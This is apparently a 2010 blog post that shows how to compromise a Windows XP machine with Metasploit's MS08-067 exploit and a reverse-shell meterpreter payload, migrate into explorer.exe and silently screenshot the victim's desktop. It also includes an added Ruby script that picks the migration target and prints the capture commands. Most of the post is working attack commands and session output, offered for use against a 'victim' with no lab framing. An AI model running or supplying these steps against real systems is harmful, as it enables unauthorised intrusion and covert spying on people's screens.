Taking Screenshots Of The Victim’s Computer With Metasploit

January 30, 2010 – 3:51 PM

Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module.  Start with a basic exploit to gain a meterpreter session.  You’ll need to migrate into a process that runs on the logged-on user’s interactive desktop (explorer.exe is the usual choice): the service process you exploited is not attached to that desktop, so a screenshot taken from it comes back as a blank image:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit

[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)

meterpreter > ps

Process list
============

PID   Name             Arch  User                          Path
---   ----             ----  ----                          ----
0     [System Process]
4     System           x86   NT AUTHORITY\SYSTEM
384   smss.exe         x86   NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
524   csrss.exe        x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
556   winlogon.exe     x86   NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
692   services.exe     x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
704   lsass.exe        x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
876   VBoxService.exe  x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\VBoxService.exe
904   svchost.exe      x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
972   svchost.exe      x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1064  svchost.exe      x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
1124  svchost.exe      x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
1192  svchost.exe      x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
1452  spoolsv.exe      x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
284   explorer.exe     x86   VM-WINXP\Troy                 C:\WINDOWS\Explorer.EXE
624   VBoxTray.exe     x86   VM-WINXP\Troy                 C:\WINDOWS\system32\VBoxTray.exe
632   ctfmon.exe       x86   VM-WINXP\Troy                 C:\WINDOWS\system32\ctfmon.exe
656   alg.exe          x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
1252  wscntfy.exe      x86   VM-WINXP\Troy                 C:\WINDOWS\system32\wscntfy.exe
1940  firefox.exe      x86   VM-WINXP\Troy                 C:\Program Files\Mozilla Firefox\firefox.exe

meterpreter > migrate 284
[*] Migrating to 284...
[*] Migration completed successfully.
meterpreter >

Now we load the espia extension and capture a frame of the victim’s desktop:

meterpreter > use espia
Loading extension espia...success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]

meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >

The image should open automatically in your browser and display on your screen; pass false as the second argument to screenshot if you only want the file written:

That’s it.  You now have a capture of the victim’s desktop, taken without anything showing on their screen.  Bear in mind that each screenshot is a single frame rather than a live view, so run the command again whenever you need a fresh one, and that migrating into explorer.exe is itself an injection into another process, which is the kind of activity host-based monitoring can flag.
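As an added example (not code from the original post or from the Metasploit project), here is a small Ruby script that automates the choice made above: it parses the text of meterpreter’s ps listing, skips everything running as a service account, prefers explorer.exe, and returns the three meterpreter commands to run. The sample listing is constructed from the one above; the service-account names and the column layout (cells sliced at the offsets of the header words) are assumptions about the ps format, and a listing with no interactive process returns nil, which is the "blank image" case.

```ruby
# Added example, not part of the original post or of Metasploit itself.
# Chooses a meterpreter migration target from the text of `ps` so that the
# espia screenshot is taken from a process on the logged-on user's
# interactive desktop rather than from a service process.

ProcEntry = Struct.new(:pid, :name, :arch, :user, :path)

# Accounts whose processes are not attached to the interactive desktop.
# Assumption: this list is enough for an XP-era target like the one above.
SERVICE_ACCOUNTS = [
  'NT AUTHORITY\SYSTEM',
  'NT AUTHORITY\LOCAL SERVICE',
  'NT AUTHORITY\NETWORK SERVICE'
].freeze

# Parse meterpreter's fixed-width `ps` table. Column boundaries are taken
# from the header line, so rows with empty cells (no arch, no path) keep
# their remaining fields in the right columns.
def parse_ps(text)
  lines = text.lines.map(&:rstrip)
  header_idx = lines.index { |l| l.match?(/\A\s*PID\s+Name/) }
  raise ArgumentError, 'no ps header found' unless header_idx

  starts = []
  lines[header_idx].scan(/\S+/) { starts << Regexp.last_match.begin(0) }

  lines.drop(header_idx + 1).each_with_object([]) do |line, procs|
    cells = starts.each_index.map do |i|
      stop = starts[i + 1] || line.length
      (line[starts[i]...stop] || '').strip
    end
    next unless cells[0].match?(/\A\d+\z/) # skips the ---- rule and blanks

    procs << ProcEntry.new(cells[0].to_i, *cells[1..4])
  end
end

# A usable screenshot host runs as a logged-on user, not a service account.
def interactive?(entry)
  !entry.user.empty? && !SERVICE_ACCOUNTS.include?(entry.user)
end

# Prefer explorer.exe (present for every logged-on user and long lived);
# otherwise take the first process owned by an interactive user.
def pick_migration_target(procs)
  candidates = procs.select { |p| interactive?(p) }
  return nil if candidates.empty?

  shell = candidates.find { |p| p.name.casecmp?('explorer.exe') }
  (shell || candidates.first).pid
end

# The meterpreter commands to run, or nil when every process belongs to a
# service account and the capture would only produce a blank image.
def screenshot_plan(ps_output, save_path)
  pid = pick_migration_target(parse_ps(ps_output))
  return nil unless pid

  ["migrate #{pid}", 'use espia', "screenshot #{save_path}"]
end

# Constructed sample, trimmed from the listing above (same columns as
# meterpreter prints them). Single-quoted heredoc keeps the backslashes.
SAMPLE_PS = <<~'PS'
  Process list
  ============

  PID   Name             Arch  User                          Path
  ---   ----             ----  ----                          ----
  0     [System Process]
  4     System           x86   NT AUTHORITY\SYSTEM
  384   smss.exe         x86   NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
  904   svchost.exe      x86   NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
  972   svchost.exe      x86   NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
  284   explorer.exe     x86   VM-WINXP\Troy                 C:\WINDOWS\Explorer.EXE
  632   ctfmon.exe       x86   VM-WINXP\Troy                 C:\WINDOWS\system32\ctfmon.exe
  656   alg.exe          x86   NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
  1940  firefox.exe      x86   VM-WINXP\Troy                 C:\Program Files\Mozilla Firefox\firefox.exe
PS

if __FILE__ == $PROGRAM_NAME
  puts screenshot_plan(SAMPLE_PS, '/tmp/victim.bmp')
end
```

Feed the returned commands to the session by hand or from a resource script. A nil result means the only candidates run as service accounts, and a screenshot taken from any of them would come back blank.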

One Response to “Taking Screenshots Of The Victim’s Computer With Metasploit”

Excellent!! You rock!! I tried it and it works perfectly.

By Yom on Jun 1, 2011
